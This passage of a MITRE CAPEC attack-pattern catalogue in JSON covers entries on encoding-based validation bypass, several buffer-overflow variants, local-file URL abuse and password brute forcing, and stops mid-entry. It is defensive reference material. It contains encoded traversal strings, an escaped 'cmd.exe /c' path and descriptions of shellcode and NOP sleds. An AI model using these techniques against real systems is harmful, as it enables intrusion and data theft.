being performed and where they want to bypass it.","Technique":"While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions."},{"Step":"2","Phase":"Experiment","Description":"[Determine which character encodings are accepted by the application/system] The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application\'s/system\'s response to the encoded data to determine whether the data was interpreted properly.","Technique":["Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, \'\\\\\'","Determine whether URL encoding is accepted by the application/system.","Determine whether UTF-8 encoding is accepted by the application/system.","Determine whether UTF-16 encoding is accepted by the application/system.","Determine if any other encodings are accepted by the application/system."]},{"Step":"3","Phase":"Experiment","Description":"[Combine multiple encodings accepted by the application.] The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.","Technique":["Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \\"\\\\\\\\\\\\.\\". With two parsing layers, this may get converted to \\"\\\\.\\" after the first parsing layer, and then, to \\".\\" after the second. If the input validation layer is between the two parsing layers, then \\"\\\\\\\\\\\\.\\\\\\\\\\\\.\\" might pass a test for \\"..\\" but still get converted to \\"..\\" afterwards. This may enable directory traversal attacks.","Combine multiple encodings and observe the effects. For example, the attacker might encode \\".\\" as \\"\\\\.\\", and then, encode \\"\\\\.\\" as \\"&#92;&#46;\\", and then, encode that using URL encoding to \\"%26%2392%3B%26%2346%3B\\""]},{"Step":"4","Phase":"Exploit","Description":"[Leverage ability to bypass input validation] Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.","Technique":["Gain access to sensitive files.","Perform command injection.","Perform SQL injection.","Perform XSS attacks."]}]},"Prerequisites":{"Prerequisite":["User input is used to construct a command to be executed on the target system or as part of the file name.","Multiple parser passes are performed on the data supplied by the user."]},"Skills_Required":{"Skill":["Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters.",{"Level":"Medium"}]},"Indicators":{"Indicator":"Control characters are being detected by the filters repeatedly."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.","Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist would not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Using Escapes",{"style":"color:#32498D; font-weight:bold;"},"Original String: C:\\\\\\\\\\\\\\\\winnt\\\\\\\\\\\\\\\\system32\\\\\\\\\\\\\\\\cmd.exe /c",{"style":"margin-left:10px;","class":"informative"}],"p":["The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \\"double escape\\" the backslash. In some cases, a quadruple escape is necessary.","This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.","[REF-1]"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"179"},{"CWE_ID":"181"},{"CWE_ID":"184"},{"CWE_ID":"183"},{"CWE_ID":"77"},{"CWE_ID":"78"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"44":{"ID":"44","Name":"Overflow Binary Resource File","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the attacker access to the execution stack and execute arbitrary code in the target process.","Extended_Description":"This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"ChildOf","CAPEC_ID":"23"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target software] The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software."}]},"Prerequisites":{"Prerequisite":["Target software processes binary resource files.","Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file."]},"Skills_Required":{"Skill":["To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Perform appropriate bounds checking on all buffers.","Design: Enforce principle of least privilege","Design: Static code analysis","Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes","Implementation: Keep software patched to ensure that known vulnerabilities are not available for attackers to target on host."]},"Example_Instances":{"Example":"Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the attacker has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Extended_Description"}]}},"45":{"ID":"45","Name":"Buffer Overflow via Symbolic Links","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program that might load in certain files to memory."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow file content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack."}]},"Prerequisites":{"Prerequisite":["The attacker can create symbolic link on the target host.","The target host does not perform correct boundary checking while consuming data from a resources."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":["An attacker creating or modifying Symbolic links is a potential signal of attack in progress.","An attacker deleting temporary files can also be a sign that the attacker is trying to replace legitimate resources with malicious ones."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.","Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.","Pay attention to the resource pointed to by your symlink links (See attack pattern named \\"Forced Symlink race\\"), they can be replaced by malicious resources.","Always check the size of the input data before copying to a buffer.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":{"div":["Attack Example: Overflow with Symbolic Links in EFTP Server",{"style":"color:#32498D; font-weight:bold;"}],"p":"The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"46":{"ID":"46","Name":"Overflow Variables and Tags","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The attacker crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"PeerOf","CAPEC_ID":"8"},{"Nature":"PeerOf","CAPEC_ID":"10"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] The adversary will upload the crafted file to the application, causing a buffer overflow."}]},"Prerequisites":{"Prerequisite":["The target program consumes user-controllable data in the form of tags or variables.","The target program does not perform sufficient boundary checking."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution.","Do not trust input data from user. Validate all user input."]},"Example_Instances":{"Example":[{"div":["Attack Example: Overflow Variables and Tags in MidiPlug",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag."},{"div":["Attack Example: Overflow Variables and Tags in Exim",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"47":{"ID":"47","Name":"Buffer Overflow via Parameter Expansion","Abstraction":"Detailed","Status":"Draft","Description":"In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":"Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer."},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer."}]},"Prerequisites":{"Prerequisite":["The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.","The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)."]},"Skills_Required":{"Skill":["Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the attacker needs to write the shell code to accomplish their goals, but the attacker also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled attacker.",{"Level":"High"}]},"Resources_Required":{"Resource":"Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":"Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system"},"Example_Instances":{"Example":[{"p":["Attack Example: FTP glob()","The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().","This buffer overflow occurs in memory that is dynamically allocated. It may be possible for attackers to exploit this vulnerability and execute arbitrary code on the affected host.","To exploit this, the attacker must be able to create directories on the target host.","The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote attacker can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the attacker must be able to create directories on the FTP server.","[REF-1]"]},{"p":["Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.","The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"130"},{"CWE_ID":"131"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"48":{"ID":"48","Name":"Passing Local Filenames to Functions That Expect a URL","Abstraction":"Standard","Status":"Draft","Description":"This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser\'s authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify web application URL inputs] Review application inputs to find those that are designed to be URLs.","Technique":["Manually navigate web site pages to identify URLs.","Use automated tools to identify URLs."]},{"Step":"2","Phase":"Experiment","Description":"[Identify URL inputs allowing local access.] Execute test local commands via each URL input to determine which are successful.","Technique":["Manually execute a local command (such as \'pwd\') via the URL inputs.","Using an automated tool, test each URL input for weakness."]},{"Step":"3","Phase":"Exploit","Description":"[Execute malicious commands] Using the identified URL inputs that allow local command execution, execute malicious commands.","Technique":"Execute local commands via the URL input."}]},"Prerequisites":{"Prerequisite":"The victim\'s software must not differentiate between the location and type of reference passed the client software, e.g. browser"},"Skills_Required":{"Skill":["Attacker identifies known local files to exploit",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.","Design: Use browser technologies that do not allow client side scripting.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser"]},"Example_Instances":{"Example":{"p":["J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains","Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access."],"div":["hibernate.connection.driver_class = org.postgresql.Driver",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"241"},{"CWE_ID":"706"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-416"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"}]}},"49":{"ID":"49","Name":"Password Brute Forcing","Abstraction":"Standard","Status":"Draft","Description":"In this attack, the adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password. A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"112"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Exploit","Description":"[Brute force password] Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.","Technique":["Manually or automatically enter all possible passwords through the application/system\'s interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.","Perform an offline dictionary attack or a rainbow table attack against a known password hash."]}]},"Prerequisites":{"Prerequisite":["An adversary needs to know a username to target.","The system uses password based authentication as the one factor authentication mechanism.","An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical."]},"Skills_Required":{"Skill":["A brute force attack is very straightforward. A variety of password cracking tools are widely available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)."},"Indicators":{"Indicator":"Many incorrect login attempts are detected by the system."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.","Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.","Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen."]},"Example_Instances":{"Example":[{"p":["A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users\' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.","An adversary\'s job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster."]},"A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: 